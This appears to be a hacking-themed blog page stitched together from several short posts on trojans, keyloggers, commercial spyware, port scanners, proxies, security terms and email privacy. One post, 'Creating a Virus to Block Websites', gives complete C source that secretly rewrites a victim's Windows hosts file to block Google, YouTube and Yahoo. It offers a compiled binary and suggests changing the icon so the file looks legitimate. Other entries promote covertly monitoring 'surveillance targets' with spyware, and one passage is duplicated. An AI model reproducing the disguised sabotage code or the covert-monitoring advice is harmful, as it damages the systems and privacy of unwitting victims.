Trojans and Backdoors

A Trojan horse is an unauthorized program contained within a legitimate program. This unauthorized program performs functions unknown (and probably unwanted) by the user.

• It is a legitimate program that has been altered by the placement of unauthorized code within it; this code performs functions unknown (and probably unwanted) by the user.


• Any program that appears to perform a desirable and necessary function but that (because of unauthorized code within it that is unknown to the user) performs functions unknown (and definitely unwanted) by the user.

Working of Trojans

 

• Attacker gets access to the trojaned system as the system goes online


• By way of the access provided by the trojan attacker can stage attacks of different types.

Various Trojan Types

• Remote Access Trojans


• Password Sending Trojans


• Keyloggers


• Destructive


• Denial Of Service (DoS) Attack Trojans


• Proxy/Wingate Trojans


• FTP Trojans


• Software Detection Killers

Modes of Transmission

• Attachments


• Physical Access


• Browser And E-mail Software Bugs


• NetBIOS (File Sharing)


• Fake Programs


• Un-trusted Sites And Freeware Software

Backdoor Countermeasures

• Most commercial ant-virus products can automatically scan and detect backdoor programs before they can cause damage (Eg. before accessing a floppy, running exe or downloading mail)


• An inexpensive tool called Cleaner (http://www.moosoft.com/cleanet.html) can identify and eradicate 1000 types of backdoor programs and trojans.


• Educate your users not to install applications downloaded from the internet and e-mail attachments.

Read More

Keyloggers (Keystroke Loggers)

Keystroke loggers are stealth software that sits between keyboard hardware and the operating system, so that they can record every key stroke.

There are two types of keystroke loggers:

1. Software based and

2. Hardware based.

Spy ware: Spector (http://www.spector.com/)

• Spector is a spy ware and it will record everything anyone does on the internet.


• Spector automatically takes hundreds of snapshots every hour, very much like a surveillance camera. With spector, you will be able to see exactly what your surveillance targets have been doing online and offline.


• Spector works by taking a snapshot of whatever is on your computer screen and saves it away in a hidden location on your computer’s hard drive.

Hacking Tool: eBlaster (http://www.spector.com/)

eBlaster lets you know EXACTLY what your surveillance targets are doing on the internet even if you are thousands of miles away.

eBlaster records their emails, chats, instant messages, websites visited and keystrokes typed and then automatically sends this recorded information to your own email address.

Within seconds of them sending or receiving an email, you will receive your own copy of that email.

Hacking Tool: (Hardware Keylogger) (http://www.keyghost.com)

 

eBlaster lets you know EXACTLY what your surveillance targets are doing on the internet even if you are thousands of miles away.

eBlaster records their emails, chats, instant messages, websites visited and keystrokes typed and then automatically sends this recorded information to your own email address.

Within seconds of them sending or receiving an email, you will receive your own copy of that email.

Hacking Tool: (Hardware Keylogger) (http://www.keyghost.com)

<

The Hardware Key Logger is a tiny hardware device that can be attached in between a keyboard and a computer.

It keeps a record of all key strokes typed on the keyboard. The recording process is totally transparent to the end user.

Read More

Port Scanning

Port Scanning is one of the most popular techniques used by hackers to discover services that can be compromised.

• A potential target computer runs many ’services’ that listen at ‘well-known’ ‘ports’.


• By scanning which ports are available on the victim, the hacker finds potential vulnerabilities that can be exploited.


• Scan techniques can be differentiated broadly into Vanilla, Strobe, Stealth, FTP Bounce, Fragmented Packets, Sweep and UDP Scans.

Port Scanning Techniques

Port Scanning Techniques can be broadly classified into:

• Open scan


• Half- open scan


• Stealth scan


• Sweeps


• Misc

Commonly used tools for port scanning

1.Tool: SuperScan 3.0

 

 

 

 

 

 

 

 

2. Tool: NMap (Network Mapper)

3. Tool: NetScan Tools Pro 2003

4. Tool: ipEye, IPSecScan

Read More

Proxy Servers and Anonymizers

Proxy is a network computer that can serve as an intermediate for connection with other computers. They are usually used for the following purposes:

 

• As firewall, a proxy protects the local network from outside access.


• As IP-addresses multiplexer, a proxy allows to connect a number of computers to Internet when having only one IP-address.


• Proxy servers can be used (to some extent) to anonymize web surfing.


• Specialized proxy servers can filter out unwanted content, such as ads or ‘unsuitable’ material.


• Proxy servers can afford some protection against hacking attacks.

Anonymizers

• Anonymizers are services that help make your own web surfing anonymous.


• The first anonymizer developed was Anonymizer.com, created in 1997 by Lance Cottrell.


• An anonymizer removes all the identifying information from a user’s computers while the user surfs the Internet, thereby ensuring the privacy of the user.

Read More

Creating a Virus to Block Websites

Most of us are familiar with the virus that used to block Orkut and Youtube site.If you are curious about creating such a virus on your own, then you are in the right place.Tody I’ll teach you how to create a simple virus that block’s websites.And as usual I’ll use my favorite programming language ‘C’ to create this website blocking virus.I will give a brief introduction about this virus before I jump into the technical jargon.

This virus has been exclusively created in ‘C’.So, anyone with a basic knowledge of C will be able to understand the working of the virus.This virus need’s to be clicked only once by the victim.Once it is clicked, it’ll block a list of websites that has been specified in the source code.The victim will never be able to surf those websites unless he re-install’s the operating system.This blocking is not just confined to IE or Firefox.So once blocked, the site will not appear in any of the browser program.

NOTE: You can also block a website manually.But, here I have created a virus that automates all the steps involved in blocking.The manual blocking process is described in the post How to Block a Website ?

Here is the sourcecode of the virus.

#include<stdio.h>

#include<dos.h>

#include<dir.h>

char site_list[6][30]={

“google.com”,

“www.google.com”,

“youtube.com”,

“www.youtube.com”,

“yahoo.com”,

“www.yahoo.com”

};

char ip[12]=”127.0.0.1″;

FILE *target;

int find_root(void);

void block_site(void);

int find_root()

{

int done;

struct ffblk ffblk;//File block structure

done=findfirst(”C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

/*to determine the root drive*/

if(done==0)

{

target=fopen(”C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

/*to open the file*/

return 1;

}

done=findfirst(”D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

/*to determine the root drive*/

if(done==0)

{

target=fopen(”D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

/*to open the file*/

return 1;

}

done=findfirst(”E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

/*to determine the root drive*/

if(done==0)

{

target=fopen(”E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

/*to open the file*/

return 1;

}

done=findfirst(”F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

/*to determine the root drive*/

if(done==0)

{

target=fopen(”F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

/*to open the file*/

return 1;

}

else return 0;

}

void block_site()

{

int i;

fseek(target,0,SEEK_END); /*to move to the end of the file*/

fprintf(target,”\n”);

for(i=0;i<6;i++)

fprintf(target,”%s\t%s\n”,ip,site_list[i]);

fclose(target);

}

void main()

{

int success=0;

success=find_root();

if(success)

block_site();

}

How to Compile ?

1. Download the source code here. Download the compiled module(virus) here.

2. Compile the sourcecode using any C/C++ compiler.

3. To test, run the compiled module. It will block the sites that is listed in the source code.

4. Once you run the file block_Site.exe, restart your browser program.Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.

4. To remove the virus type the following the Run.

%windir%\system32\drivers\etc

5. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this

127.0.0.1—————————google.com

6. Delete all such entries which contain the names of blocked sites.

NOTE: You can also change the ICON of the virus to make it look like a legitimate program.This method is described in the post:How to Change the ICON of an EXE file ?

Read More

Common Terminologies used in Internet Security

If you are a newbie in Internet security, you have come to the right place. The following is information on some common terms used in Internet security. So next time you don’t have to scratch your head when someone uses these.

Firewall – is a system that acts as a barrier between your computer network and the Internet. A firewall controls the flow of information according to security policies.

Hacker – can be anyone specializing in accessing computer based systems for illegal purposes or just for the fun of it.

IP spoofing – is an attempt to access your system by pretending like another system. This is done by setting up a system with an IP address that you normally trust.

Sniffing – is the spying on electronic transmissions to access data. This mostly occurs in privately owned LAN networks connected to the web.

Trojan horse - a program pretending like useful software, while its actual strategy is to access, steal or destroy user data and access authorization. Apart from destroying information, trojans can also create a backdoor on your system for stealing confidential information.

Virus – is a program that attaches itself to a program or file. This allows it to spread across networks and cause damage to software and hardware. To operate, viruses require the execution of the attached file.

Worm - A worm is almost similar to a virus, except that it doesn’t need the execution of any executable file to get activated. It can also replicate itself as it travels across networks.

Read More

Tips to improve Email Privacy

Many websites ask for your email address when you shop online, download a free software etc. But do you know that this has a chance of affecting your email privacy through Spam emails?

Though most websites don’t use spamming as an email marketing strategy, there are a few that use junk emails that don’t care about anti-Spam laws. Here are some tips to maintain your email privacy from such threats.

Before submitting your email address you need to check the reputation of the company. Reputed websites would normally follow the right email practices to ensure your email privacy. Such companies will never want to loose their hard earned reputation by getting blammed for spamming.

See whether the websites provides email privacy statements. You need to go through these statement in detail, and know about the kind of emails that will be sent to you, how often etc. Based on this you can decide on whether you need such emails. You don’t want to give your email address to some fraud company that is thinking about handing over your email address to hundreds of other websites.

Finally, check whether the website really respects your privacy. Often you will find some text like “I agree to receive email” that comes with a check box. You can agree to receive emails by checking the check box. If the check box is already checked, it is just a good indication that the website doesn’t respect your privacy. So watch out!

Read More